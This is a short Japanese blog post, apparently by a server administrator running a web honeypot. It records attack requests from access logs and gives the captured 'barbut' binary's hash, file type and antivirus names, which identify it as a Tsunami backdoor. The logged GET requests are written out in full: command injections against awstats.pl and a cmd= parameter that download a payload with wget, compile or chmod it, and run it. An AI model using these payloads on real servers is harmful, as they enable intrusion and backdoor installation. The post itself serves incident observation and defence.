barbut
ここ2,3日でこんなアクセスが、、、
named virtual hostのログにはなく、IPアドレスのログにしか出ていなかった
GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
GET /cgi-bin/stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
GET /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
GET /awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20xxx.xxx.xxx.xxx/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1
GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://example.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1
GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://example.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://example.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
これはaccess_log から
webハニーポットもしかけているので、いろいろ捕れてきている
こんなファイルも捕獲
バイナリはこんなかんじ
Size:31044
MD5 (barbut) = 6c102be00c02d8c9ae2c0491cd55660c
barbut: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
ClamAV:Trojan.Tsunami.B
Kaspersky:Backdoor.Linux.Tsunami.al
ソースは取得失敗している